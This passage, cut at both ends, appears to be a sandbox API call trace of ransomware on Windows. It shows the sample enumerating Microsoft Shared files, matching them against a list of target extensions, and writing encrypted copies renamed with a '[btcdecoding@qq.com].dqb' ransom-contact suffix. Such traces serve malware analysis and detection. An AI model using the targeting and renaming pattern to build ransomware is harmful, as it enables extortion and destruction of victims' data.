dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.492] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=6406) returned 1 [0042.492] CloseHandle (hObject=0x174) returned 1 [0042.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg")) returned 0x20 [0042.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.492] lstrlenW (lpString=".doc") returned 4 [0042.492] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.492] lstrlenW (lpString=".docx") returned 5 [0042.492] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.492] lstrlenW (lpString=".pdf") returned 4 [0042.492] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.492] lstrlenW (lpString=".xls") returned 4 [0042.492] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.492] lstrlenW (lpString=".xlsx") returned 5 [0042.492] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.492] lstrlenW (lpString=".ppt") returned 4 [0042.492] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.492] lstrlenW (lpString=".zip") returned 4 [0042.492] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.492] lstrlenW (lpString=".rar") returned 4 [0042.492] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.492] lstrlenW (lpString=".bz2") returned 4 [0042.493] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.493] lstrlenW (lpString=".7z") returned 3 [0042.493] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.493] lstrlenW (lpString=".dbf") returned 4 [0042.493] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.493] lstrlenW (lpString=".1cd") returned 4 [0042.493] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.493] lstrlenW (lpString=".jpg") returned 4 [0042.493] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.493] lstrlenW (lpString=".doc") returned 4 [0042.493] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.493] lstrlenW (lpString=".docx") returned 5 [0042.493] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.493] lstrlenW (lpString=".pdf") returned 4 [0042.493] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.493] lstrlenW (lpString=".xls") returned 4 [0042.493] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.493] lstrlenW (lpString=".xlsx") returned 5 [0042.493] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.493] lstrlenW (lpString=".ppt") returned 4 [0042.493] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.493] lstrlenW (lpString=".zip") returned 4 [0042.493] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.493] lstrlenW (lpString=".rar") returned 4 [0042.493] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.493] lstrlenW (lpString=".bz2") returned 4 [0042.493] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.493] lstrlenW (lpString=".7z") returned 3 [0042.493] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.494] lstrlenW (lpString=".dbf") returned 4 [0042.494] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.494] lstrlenW (lpString=".1cd") returned 4 [0042.494] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0042.494] lstrlenW (lpString=".jpg") returned 4 [0042.494] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.494] lstrcmpiW (lpString1=".wmf", lpString2=".dqb") returned 1 [0042.494] lstrlenW (lpString="grid_(cm).wmf") returned 13 [0042.494] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.494] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=2920) returned 1 [0042.494] CloseHandle (hObject=0x174) returned 1 [0042.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf")) returned 0x20 [0042.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.494] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.494] lstrlenW (lpString=".doc") returned 4 [0042.494] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0042.495] lstrlenW (lpString=".docx") returned 5 [0042.495] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0042.495] lstrlenW (lpString=".pdf") returned 4 [0042.495] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0042.495] lstrlenW (lpString=".xls") returned 4 [0042.495] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0042.495] lstrlenW (lpString=".xlsx") returned 5 [0042.495] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0042.495] lstrlenW (lpString=".ppt") returned 4 [0042.495] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0042.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.495] lstrlenW (lpString=".zip") returned 4 [0042.495] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0042.495] lstrlenW (lpString=".rar") returned 4 [0042.495] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0042.495] lstrlenW (lpString=".bz2") returned 4 [0042.495] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0042.495] lstrlenW (lpString=".7z") returned 3 [0042.495] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0042.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.495] lstrlenW (lpString=".dbf") returned 4 [0042.495] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0042.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.495] lstrlenW (lpString=".1cd") returned 4 [0042.495] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0042.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.495] lstrlenW (lpString=".jpg") returned 4 [0042.495] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0042.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.495] lstrlenW (lpString=".doc") returned 4 [0042.495] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0042.495] lstrlenW (lpString=".docx") returned 5 [0042.495] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0042.495] lstrlenW (lpString=".pdf") returned 4 [0042.495] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0042.496] lstrlenW (lpString=".xls") returned 4 [0042.496] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0042.496] lstrlenW (lpString=".xlsx") returned 5 [0042.496] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0042.496] lstrlenW (lpString=".ppt") returned 4 [0042.496] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0042.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.496] lstrlenW (lpString=".zip") returned 4 [0042.496] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0042.496] lstrlenW (lpString=".rar") returned 4 [0042.496] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0042.496] lstrlenW (lpString=".bz2") returned 4 [0042.496] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0042.496] lstrlenW (lpString=".7z") returned 3 [0042.496] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0042.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.496] lstrlenW (lpString=".dbf") returned 4 [0042.496] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0042.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.496] lstrlenW (lpString=".1cd") returned 4 [0042.496] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0042.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0042.496] lstrlenW (lpString=".jpg") returned 4 [0042.496] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0042.496] lstrcmpiW (lpString1=".wmf", lpString2=".dqb") returned 1 [0042.496] lstrlenW (lpString="grid_(inch).wmf") returned 15 [0042.496] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.497] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=7498) returned 1 [0042.497] CloseHandle (hObject=0x174) returned 1 [0042.497] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf")) returned 0x20 [0042.497] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.497] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.497] lstrlenW (lpString=".doc") returned 4 [0042.497] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0042.497] lstrlenW (lpString=".docx") returned 5 [0042.497] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0042.497] lstrlenW (lpString=".pdf") returned 4 [0042.497] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0042.497] lstrlenW (lpString=".xls") returned 4 [0042.497] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0042.497] lstrlenW (lpString=".xlsx") returned 5 [0042.497] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0042.497] lstrlenW (lpString=".ppt") returned 4 [0042.497] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0042.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.497] lstrlenW (lpString=".zip") returned 4 [0042.497] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0042.497] lstrlenW (lpString=".rar") returned 4 [0042.497] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0042.497] lstrlenW (lpString=".bz2") returned 4 [0042.497] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0042.497] lstrlenW (lpString=".7z") returned 3 [0042.497] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0042.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.497] lstrlenW (lpString=".dbf") returned 4 [0042.497] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0042.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.498] lstrlenW (lpString=".1cd") returned 4 [0042.498] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0042.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.498] lstrlenW (lpString=".jpg") returned 4 [0042.498] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0042.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.498] lstrlenW (lpString=".doc") returned 4 [0042.498] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0042.498] lstrlenW (lpString=".docx") returned 5 [0042.498] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0042.498] lstrlenW (lpString=".pdf") returned 4 [0042.498] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0042.498] lstrlenW (lpString=".xls") returned 4 [0042.498] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0042.498] lstrlenW (lpString=".xlsx") returned 5 [0042.498] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0042.498] lstrlenW (lpString=".ppt") returned 4 [0042.498] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0042.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.498] lstrlenW (lpString=".zip") returned 4 [0042.498] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0042.498] lstrlenW (lpString=".rar") returned 4 [0042.498] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0042.498] lstrlenW (lpString=".bz2") returned 4 [0042.498] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0042.498] lstrlenW (lpString=".7z") returned 3 [0042.498] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0042.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.498] lstrlenW (lpString=".dbf") returned 4 [0042.498] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0042.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.498] lstrlenW (lpString=".1cd") returned 4 [0042.498] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0042.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0042.499] lstrlenW (lpString=".jpg") returned 4 [0042.499] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0042.499] lstrcmpiW (lpString1=".htm", lpString2=".dqb") returned 1 [0042.499] lstrlenW (lpString="Hand Prints.htm") returned 15 [0042.499] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0042.920] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=235) returned 1 [0042.920] CloseHandle (hObject=0x17c) returned 1 [0042.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm")) returned 0x20 [0042.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.920] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.920] lstrlenW (lpString=".doc") returned 4 [0042.920] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.920] lstrlenW (lpString=".docx") returned 5 [0042.920] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.920] lstrlenW (lpString=".pdf") returned 4 [0042.920] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.920] lstrlenW (lpString=".xls") returned 4 [0042.920] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.920] lstrlenW (lpString=".xlsx") returned 5 [0042.920] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.920] lstrlenW (lpString=".ppt") returned 4 [0042.920] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.921] lstrlenW (lpString=".zip") returned 4 [0042.921] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.921] lstrlenW (lpString=".rar") returned 4 [0042.921] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.921] lstrlenW (lpString=".bz2") returned 4 [0042.921] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.921] lstrlenW (lpString=".7z") returned 3 [0042.921] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.921] lstrlenW (lpString=".dbf") returned 4 [0042.921] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.921] lstrlenW (lpString=".1cd") returned 4 [0042.921] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.921] lstrlenW (lpString=".jpg") returned 4 [0042.921] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.921] lstrlenW (lpString=".doc") returned 4 [0042.921] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.921] lstrlenW (lpString=".docx") returned 5 [0042.921] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.921] lstrlenW (lpString=".pdf") returned 4 [0042.921] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.921] lstrlenW (lpString=".xls") returned 4 [0042.921] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.921] lstrlenW (lpString=".xlsx") returned 5 [0042.921] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.921] lstrlenW (lpString=".ppt") returned 4 [0042.921] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.921] lstrlenW (lpString=".zip") returned 4 [0042.922] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.922] lstrlenW (lpString=".rar") returned 4 [0042.922] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.922] lstrlenW (lpString=".bz2") returned 4 [0042.922] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.922] lstrlenW (lpString=".7z") returned 3 [0042.922] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.922] lstrlenW (lpString=".dbf") returned 4 [0042.922] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.922] lstrlenW (lpString=".1cd") returned 4 [0042.922] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.922] lstrlenW (lpString=".jpg") returned 4 [0042.922] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.922] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0042.922] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0042.922] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.236] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=19780) returned 1 [0043.236] CloseHandle (hObject=0x1a8) returned 1 [0043.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png")) returned 0x20 [0043.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.236] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.237] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.237] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.237] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.237] GetLastError () returned 0x0 [0043.237] ReadFile (in: hFile=0x1a8, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x4d44, lpOverlapped=0x0) returned 1 [0043.238] WriteFile (in: hFile=0x1dc, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x4d50, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x4d50, lpOverlapped=0x0) returned 1 [0043.239] ReadFile (in: hFile=0x1a8, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.239] WriteFile (in: 